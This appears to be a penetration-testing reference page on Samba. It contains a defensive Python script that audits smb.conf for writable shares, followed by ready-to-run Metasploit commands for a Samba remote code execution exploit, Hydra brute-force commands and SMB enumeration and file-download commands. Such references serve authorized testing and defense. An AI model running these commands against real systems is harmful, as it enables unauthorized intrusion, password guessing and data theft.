Samba
Samba is the Linux implementation of SMB, and allows Windows systems to access Linux shares and files.
Samba v3.5.0 is affected by a remote code execution vulnerability: a malicious client can upload a shared library to a writable share and then cause the server to load and execute it.
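A defensive check for the precondition described above (a writable share), added here as an example and not part of the original page: it parses smb.conf text and reports writable shares, plus whether nt pipe support is still enabled (setting it to no in [global] is the workaround Samba published for this bug). The function names and the sample configuration are constructed for illustration. Include directives and backslash line continuations are not handled, so on a real host run it over the output of testparm -s.

```python
import re

TRUE = {"yes", "true", "on", "1"}
# Names with whitespace removed; True means "yes" makes the share writable.
WRITE_KEYS = {"readonly": False, "writable": True, "writeable": True, "writeok": True}
# Constructed sample configuration, not taken from a real server.
SAMPLE = """\
[global]
   workgroup = LAB
[public]
   guest ok = yes
   writeable = yes
[staff]
   Read Only = No
"""

def parse_smb_conf(text):
    # Samba ignores case and whitespace in section and parameter names.
    sections, current = {}, None
    for line in map(str.strip, text.splitlines()):
        header = re.fullmatch(r"\[(.+)\]", line)
        if header:
            current = sections.setdefault(header.group(1).strip().lower(), {})
        elif current is not None and "=" in line and line[0] not in "#;":
            key, value = line.split("=", 1)
            current[re.sub(r"\s+", "", key).lower()] = value.strip().lower()
    return sections

def flags(params, writable, guest):  # section settings override inherited ones
    for key, value in params.items():
        if key in WRITE_KEYS:
            writable = (value in TRUE) == WRITE_KEYS[key]
        elif key in ("guestok", "public"):
            guest = value in TRUE
    return writable, guest

def audit(text):
    conf = parse_smb_conf(text)
    glob = conf.pop("global", {})
    pipes_on = glob.get("ntpipesupport", "yes") in TRUE  # Samba's default is yes
    findings = [("global", "nt pipe support enabled")] if pipes_on else []
    defaults = flags(glob, False, False)  # default: read-only, no guest access
    for name, params in conf.items():
        writable, guest = flags(params, *defaults)
        if writable:
            findings.append((name, "writable, guest" if guest else "writable, authenticated"))
    return findings

if __name__ == "__main__":
    print(*audit(SAMPLE), sep="\n")
```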
Exploitation using Metasploit
use exploit/linux/samba/is_known_pipename
set RHOSTS TARGET_IP
run
Attack Vectors
Hydra
Brute force attack with Hydra
hydra -L USERS_LIST -P PASS_LIST TARGET_IP smb
hydra -l USER_NAME -P PASS_LIST TARGET_IP smb
Enumeration
smbmap
# List shares
smbmap -H TARGET_IP -u USERNAME -p PASSWORD
# Recursive list
smbmap -H TARGET_IP -u USERNAME -p PASSWORD -r
# Recursive list of a specific share
smbmap -H TARGET_IP -u USERNAME -p PASSWORD -r 'SHARE_NAME'
# Download file
smbmap -H TARGET_IP -u USERNAME -p PASSWORD --download 'SHARE_NAME/FILE_NAME'
smbclient
# List shares on the Samba server
smbclient -L TARGET_IP -U USERNAME
# Enter password
# Access a share
smbclient //TARGET_IP/SHARE_NAME -U USERNAME
enum4linux
Enum4linux is a tool for enumerating information from SMB and Samba systems. It attempts to offer similar functionality to enum.exe.
enum4linux -a TARGET_IP
# Enumeration using credentials
enum4linux -a -u USERNAME -p PASSWORD TARGET_IP
# Get users list
enum4linux -U -o TARGET_IP
# Do all simple enumeration
enum4linux -a -o TARGET_IP